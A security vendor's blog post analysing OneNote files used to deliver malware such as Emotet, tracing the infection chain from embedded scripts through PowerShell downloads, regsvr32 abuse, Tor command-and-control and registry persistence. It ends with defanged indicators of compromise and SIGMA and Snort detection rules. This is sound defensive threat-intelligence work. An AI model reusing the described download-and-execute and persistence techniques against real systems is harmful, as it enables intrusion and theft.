Laura

19/05/2023

OneNote malware: A growing threat

This blog was written by Lachlan Godding, SenseOn Security Analyst.

Microsoft OneNote is used by people working in organisations from schools to business consultancy firms for note-taking. 

OneNote is also a growing source of cybersecurity risk. 

The note-taking software’s users are a target for cybercriminals and phishing campaigns. Microsoft OneNote files and OneNote attachments are an increasingly common malware delivery method. Over 50 malware campaigns using Microsoft OneNote for malware distribution were observed in Q1 2023 alone. 

To help security teams combat risk from malicious OneNote files, SenseOn has analysed various strains of malware using OneNote as the delivery vector. We observed these samples in attack campaigns globally throughout early 2023.

This article will discuss the trends observed across these samples and how SenseOn leveraged our state-of-the-art telemetry to gain insight into this attack vector.

In our analysis of malicious OneNote .one samples, we found a common infection chain that security teams can look out for:

Across the samples we analysed, the most common payload was the Emotet trojan. This is regularly spread via malicious emails and is linked to the threat actor Mummy Spider (also known as TA54).

Background

OneNote abuse is a growing threat.

A recent report by Proofpoint found that there has been a significant increase in the abuse of Microsoft OneNote in cyberattacks.

One factor driving this rise is Microsoft disabling automatic macro execution by default in traditional Office tools. This has cut off a traditional initial access pathway for many threat actors.

Another is that cybercriminals need to bypass the Mark-of-the-web (MOTW) security feature, which flags potentially malicious files downloaded from the internet.

To bypass these protection mechanisms, malicious scripts are being embedded within OneNote ‘.one’ files by threat actors, which are delivered to targets as part of attack campaigns.

When opened, the malicious file delivers a second-stage payload. We observed Remote Access Trojans (RATs), such as AgentTesla and AsyncRAT, using this delivery mechanism throughout December 2022. In recent months, other malware strains have become more prevalent among malicious OneNote payloads, including Emotet, IcedID and Qakbot.

OneNote Malware Sample 1

Failed to retrieve 2nd stage due to the domain failing to resolve 

The malicious OneNote document displays a message imitating the document having remote attachments to dupe the user into selecting the ‘Open’ icon. Underneath this icon lies an embedded malicious CMD file, ‘Open.cmd’, which will execute automatically when the icon is clicked.

Figure 1. Malicious OneNote document with hidden embedded script.
Figure 1. Malicious OneNote document with hidden embedded script.

Analysing the malicious script in a text editor, it is observed leveraging PowerShell to execute a Base64 encoded command. The output of this command is written to a file located at ‘C:\programdata and subsequently executed.

Figure 2. Contents of the malicious ‘Open.cmd’ script.
Figure 2. Contents of the malicious ‘Open.cmd’ script.

Decoding this, the underlying PowerShell command to be executed is revealed.

Figure 3. Decoded PowerShell script contents.
Figure 3. Decoded PowerShell script contents.

This command is used to silently reach out to an external domain ‘https[:]//starcomputadoras[.]com’ over HTTPS and retrieve a malicious DLL called ‘01.gif’. The .gif file extension is likely a detection evasion mechanism. This file is stored in the local ‘C:\programdata’ directory as ‘putty.jpg’ and immediately loaded using rundll32 and the ‘Wind’ argument. 

The below telemetry snapshot shows the process chain initiated by running this file.

Figure 4. SenseOn telemetry showing execution of malicious PowerShell script.
Figure 4. SenseOn telemetry showing execution of malicious PowerShell script.

Although the domain used for the second stage was flagged as malicious by several online vendors, it was no longer active at the time of analysis. Therefore, the second stage payload failed to download and execute, and we were unable to connect to the malicious URL.

Figure 5. VirusTotal flags domain as malicious and displays a ‘500’ error indicating it is unreachable.
Figure 5. VirusTotal flags the domain as malicious and displays a ‘500’ error indicating it is unreachable.

Figure 6. Malicious https[:]//starcomputadoras[.]com domain can no longer be connected to.
Figure 6. Malicious https[:]//starcomputadoras[.]com domain can no longer be connected to.

OneNote Malware Sample 2

Emotet

This next sample involved a similar fraudulent popup advising the user to select a ‘View’ icon, which masked a malicious embedded script: ‘press to unlock.vbs’.

Figure 7. Second infected OneNote file with embedded script.

Analysing the contents of this script reveals several layers of obfuscation employed by the author. In this case, the malware author is attempting to both evade detection by automated scanners and inhibit reverse-engineering activities by assigning variables to randomly generated words and formulaically extracting certain characters from these variables to be executed as a command.

Figure 8. Heavily obfuscated contents of the malicious script.
Figure 8. Heavily obfuscated contents of the malicious script.

Looking toward the end of this script, we observe a call to create a WScript shell, which is used to run the resulting obfuscated command. 

Modifying the script to echo this command instead of executing it and then running this modified script reveals the unobfuscated contents intended to be run by the original author.

Figure 9. Original tail of malicious script where a call to execute is made.
Figure 9. Original tail of malicious script where a call to execute is made.
Figure 10. Modified version of the script which prints the command instead of executing.
Figure 10. Modified version of the script, which prints the command instead of executing.
Figure 11. Output of running the modified script.
Figure 11. Output of running the modified script.

As seen above, the deobfuscated script appears to use an instance of VBScript to run a created ‘.txt’ file. This file uses a ‘.txt’ file extension to evade detection and lower suspicions. Opening this file, a similar level of obfuscation can be seen, using random words and concatenating different parts of these variables to create the desired command.

Figure 12. Modified second-stage script to print the command instead of executing 
Figure 12. Modified second-stage script to print the command instead of executing. 

Similarly, modifying this script to return the command rather than executing it reveals it was being used to retrieve a final payload from a series of malicious domains, trying each listed domain until success was received. In this case, uploading the MD5 hash of this file to VirusTotal reveals the payload to be a strain of the Emotet trojan.

Figure 13. Deobfuscated script reveals payload and several malicious URLs.
Figure 13. Deobfuscated script reveals payload and several malicious URLs.

Executing this malware in a sandbox environment, monitored by the SenseOn agent, several malicious actions can be observed from analysis of raw ingested telemetry and relevant security observations generated by SenseOn.

The malicious VB script can be seen retrieving the malicious payload over HTTP from the first of the malicious URLs referenced in the first de-obfuscated script.

Figure 14. SenseOn telemetry capturing script execution and payload retrieval.
Figure 14. SenseOn telemetry capturing script execution and payload retrieval.
Figure 14. SenseOn telemetry capturing script execution and payload retrieval.

The malware then abused the native ‘regsvr32.exe’ process to run a series of malicious binaries with seemingly randomly generated names, some of which were executed with the ‘/scomma’ argument, all run from the \AppData\Local\Temp directory.

Figure 15. Security security observation generated by SenseOn for unusual activity from %AppData%.
Figure 15. Security observation generated by SenseOn for unusual activity from %AppData%.
Figure 16. SenseOn telemetry capturing execution of malicious binaries.
Figure 16. SenseOn telemetry capturing execution of malicious binaries.

Regsvr32 was also abused to establish Command and Control (C2) using connections to nodes in the Tor network.

Figure 17. SenseOn telemetry showing outbound connections by regsvr32 to Tor nodes.
Figure 17. SenseOn telemetry showing outbound connections by regsvr32 to Tor nodes.

Tor is likely used in this case to provide the author with an additional layer of anonymity and increase the difficulty of detection and remediation using traditional toolsets. 

Figure 18. SenseOn security observation generated in response to Tor traffic.
Figure 18. SenseOn security observation generated in response to Tor traffic.
Figure 19. SenseOn telemetry showing execution of ‘I7BUGMOAp1mnW79z5M0bLi0WI5oFMy2wIqc.dll’.
Figure 19. SenseOn telemetry showing execution of ‘I7BUGMOAp1mnW79z5M0bLi0WI5oFMy2wIqc.dll’.

Regsvr32 was additionally leveraged to run a malicious “I7BUGMOAp1mnW79z5M0bLi0WI5oFMy2wIqc.dll” DLL file. This dll executed a series of information gathering commands such as ‘systeminfo’ and ‘ipconfig /all’. 

These are often used as enumeration techniques to determine device vulnerabilities and locations of interest to begin the process of propagation.

Figure 20. SenseOn security observation created for anomalous use of regsvr32.
Figure 20. SenseOn security observation created for anomalous use of regsvr32.
Figure 21. SenseOn telemetry capturing enumeration commands by regsvr32
Figure 21. SenseOn telemetry capturing enumeration commands by regsvr32.
Figure 22. SenseOn security observation generated in response to unusual outbound connections by regsvr32
Figure 22. SenseOn security observation generated in response to unusual outbound connections by regsvr32.

To maintain persistence on the infected machine, the malware configures the malicious DLL file to be automatically run by Regsvr32 upon device startup, adding itself to the ​​HKEY_USERS\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry location

Figure 23. SenseOn telemetry capturing the malicious startup item.
Figure 23. SenseOn telemetry capturing the malicious startup item.

IOCs

Domain IOCs

sachininternational.com[.]tr
erkaradyator.com[.]tr
esentai-gourmet[.]kz
ardena[.]pro
panel.chatzy[.]in
toiaagrosciences1.hospedagemdesites[.]ws
suppliercity.com[.]mx

IP IOCs

159[.]65[.]88[.]10
167[.]172[.]253[.]162
95[.]217[.]221[.]146
82[.]223[.]21[.]224
147[.]139[.]166[.]154
183[.]111[.]227[.]137
201[.]94[.]166[.]162
186[.]194[.]240[.]217
206[.]189[.]28[.]199
1[.]234[.]2[.]232
188[.]44[.]20[.]25
159[.]89[.]202[.]34
149[.]56[.]131[.]28
45[.]176[.]232[.]124
153[.]92[.]5[.]27
45[.]235[.]8[.]30
129[.]232[.]188[.]93
79[.]137[.]35[.]198
119[.]59[.]103[.]152
103[.]75[.]201[.]2
173[.]212[.]193[.]249
139[.]59[.]126[.]41
185[.]4[.]135[.]165
197[.]242[.]150[.]244
94[.]23[.]45[.]86
115[.]68[.]227[.]76
202[.]129[.]205[.]3
107[.]170[.]39[.]149
5[.]135[.]159[.]50
172[.]105[.]226[.]75
213[.]239[.]212[.]5
167[.]172[.]199[.]165
209[.]126[.]85[.]32
198[.]199[.]65[.]189
187[.]63[.]160[.]88

MD5 Hash IOCs

cde1a4983674221e32035465ff72c577
9eae6f49a02d6eb9f75af7bbf4349808
c862aed0ddd602cafc5bfdf212e0bd4d

Detections 

SIGMA Rules

title: Detect Regsvr32 Binary execution
description: Detects when regsvr32 executes an exe file other than an instance of itself
status: experimental
author: Lachlan Godding
logsource:
   product: windows
   category: process_creation
detection:
   selection:
     ParentImage|endswith: '\regsvr32.exe'
     Image|endswith: '\.exe'
   filter:
     Image|endswith: '\regsvr32.exe'
   condition: selection and not filter
   level: high


title: Detect Regsvr32 enumeration command
description: Detects when regsvr32 runs commands commonly used for enumeration
status: experimental
author: Lachlan Godding
logsource:
   product: windows
   category: process_creation
detection:
   selection:
     ParentImage|endswith: '\regsvr32.exe'
     Image|endswith:
       - '\systeminfo.exe'
       - '\ipconfig.exe'
   condition: selection
   level: high

title: Powershell downloading unusual file types
description: Detects PowerShell makes a web request to download suspicious file types
status: experimental
author: Lachlan Godding
logsource:
  product: windows
  category: process_creation
detection:
  selection:
    ParentImage|endswith: '\cmd.exe'
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - 'invoke-webrequest'
      - 'SW52b2tlLVdlYlJlcXVlc3Q=' #base64 version
   filter:
     CommandLine|regex:
      - '-uri.*\.txt'
      - '-uri.*\.msi'
      - '-uri.*\.json'
      - '-uri.*\.csv'
      - '-uri.*\.pdf' 
#optionally adjust these to represent normal filetypes for the environment
   condition: selection and not filter
   level: high

title: OneNote spawning unusual child process
description: Detects OneNote spawning suspicious child processes (not browser or office)
status: experimental
author: Lachlan Godding
logsource:
   product: windows
   category: process_creation
detection:
   selection:
     ParentImage|endswith: '\onenote.exe'
   filter:
     Image|endswith:
     - '\msedge.exe'
     - '\msedgewebview2.exe'
     - '\chrome.exe'
     - '\firefox.exe'
     - '\opera.exe'
     - '\brave.exe'
     - '\iexplore.exe'
     - '\winword.exe'
     - '\excel.exe'
     - '\powerpnt.exe'
     - '\acrord32.exe'
     - '\acrobat.exe'
     - '\onenotem.exe'
     - '\outlook.exe'
     - '\teams.exe'
     - '\notepad.exe'
     - '\protocolhandler.exe'
     - '\onenote.exe'
     - '\ai.exe'
     - '\splwow64.exe'


   condition: selection and not filter
   level: high

Snort

alert tcp any any -> any any (msg:”Potential Emotet User Agent Detected”; flow:to_server,established; content:”User-Agent|3a| Mozilla/5.0 (Windows NT 6.1; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0|0d 0a|”; nocase; sid:1000001; rev:1;)